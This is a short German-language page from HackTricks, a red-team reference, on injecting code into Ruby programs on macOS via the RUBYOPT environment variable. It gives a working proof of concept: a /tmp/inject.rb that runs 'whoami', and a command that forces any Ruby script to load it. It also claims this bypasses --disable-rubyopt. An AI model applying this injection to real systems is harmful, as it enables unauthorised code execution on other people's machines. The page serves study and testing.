HackTricksmacOS Ruby Applications Injection
Tip
Lernen & üben Sie AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.
RUBYOPT
Mit dieser Umgebungsvariable ist es möglich, neue Parameter zu ruby hinzuzufügen, wann immer es ausgeführt wird. Obwohl der Parameter -e nicht verwendet werden kann, um Ruby-Code anzugeben, ist es möglich, die Parameter -I und -r zu verwenden, um einen neuen Ordner zum Bibliotheksladepfad hinzuzufügen und dann eine Bibliothek zum Laden anzugeben.
Erstellen Sie die Bibliothek inject.rb in /tmp:
puts `whoami`
Erstellen Sie irgendwo ein Ruby-Skript wie:
puts 'Hello, World!'
Dann lassen Sie ein beliebiges Ruby-Skript es mit:
RUBYOPT="-I/tmp -rinject" ruby hello.rb
Fun Fact: Es funktioniert sogar mit dem Parameter --disable-rubyopt:
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
Tip
Lernen & üben Sie AWS Hacking:
Lernen & üben Sie GCP Hacking:Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.